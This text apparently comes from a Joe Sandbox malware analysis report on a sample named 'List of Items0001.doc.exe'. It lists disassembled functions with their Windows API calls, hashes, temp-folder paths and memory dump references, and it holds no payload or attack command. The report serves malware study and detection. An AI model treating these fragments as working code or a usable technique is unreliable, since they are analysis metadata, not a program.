                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                • Opcode Fuzzy Hash: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                Function 6DB616BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6DB622D8,?,00000808), ref: 6DB616D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6DB622D8,?,00000808), ref: 6DB616DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6DB622D8,?,00000808), ref: 6DB616F0
                                                • GetProcAddress.KERNEL32(6DB622D8,00000000), ref: 6DB616F7
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB61700
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 1bf0f08437e8c7d445111d16c92f2d53293e63b847078371cce7822d0828cd8f
                                                • Instruction ID: bce048638406c00e45bfd0f6a889c28322a2aed9e068e48492703e58ab460dd6
                                                • Opcode Fuzzy Hash: 1bf0f08437e8c7d445111d16c92f2d53293e63b847078371cce7822d0828cd8f
                                                • Instruction Fuzzy Hash: C3F01C7220A5787BDA2116E6CC4CDABBEACEF8F2F5B120215F629931D4C6618C01D7F1
                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-787714339
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                Function 6DB610E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6DB61171
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6DB611E3
                                                • GlobalFree.KERNEL32 ref: 6DB6124A
                                                • GlobalFree.KERNEL32(?), ref: 6DB6129B
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB612B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 37b0703a74576dbce990d7b4f4f98c6871d5b3227bea0ba6394c5993f8dce4b0
                                                • Instruction ID: e5377f9b7ae6f7fd433317e9f3d77e0989a9f5270856c7cd171ee1367bf8d032
                                                • Opcode Fuzzy Hash: 37b0703a74576dbce990d7b4f4f98c6871d5b3227bea0ba6394c5993f8dce4b0
                                                • Instruction Fuzzy Hash: A2518F759082C2DFDB01CF68C844A3977F8FB0A795B0A4129EA46DB29DE734E910CB74
                                                Function 00401B9B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalFree.KERNEL32(005EE2E0), ref: 00401C0B
                                                • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C1D
                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$AllocFreelstrcatlstrlen
                                                • String ID: Call$^
                                                • API String ID: 3292104215-3393712075
                                                • Opcode ID: 4319b31a17754bffce461f57a5489b402a00cd847fb6eeae40cdae925115eaf0
                                                • Instruction ID: d74cddccbdd50a14e5bf5e3e63826a63b2a65df0fd836753f00777670cd3b466
                                                • Opcode Fuzzy Hash: 4319b31a17754bffce461f57a5489b402a00cd847fb6eeae40cdae925115eaf0
                                                • Instruction Fuzzy Hash: 5321D872904210DBDB20EFA4DEC4E5E73A4AB047157150A3BF542F72D0D6BD9C518BAD
                                                Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp$C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll
                                                • API String ID: 1659193697-668016552
                                                • Opcode ID: 9a86cc41fb3ba1d07c106fca7ec167276fc7dee72b5d11bed2732143b2a4cd05
                                                • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                • Opcode Fuzzy Hash: 9a86cc41fb3ba1d07c106fca7ec167276fc7dee72b5d11bed2732143b2a4cd05
                                                • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                • C:\Users\user\AppData\Local\Temp\nsnB66F.tmp, xrefs: 00403C5B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsnB66F.tmp
                                                • API String ID: 2962429428-2357032450
                                                • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040566D
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                  • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                Function 00406536 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00406587
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                • Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\List of Items0001.doc.exe,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 00405F89
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\List of Items0001.doc.exe,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 00405F99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3443045126
                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
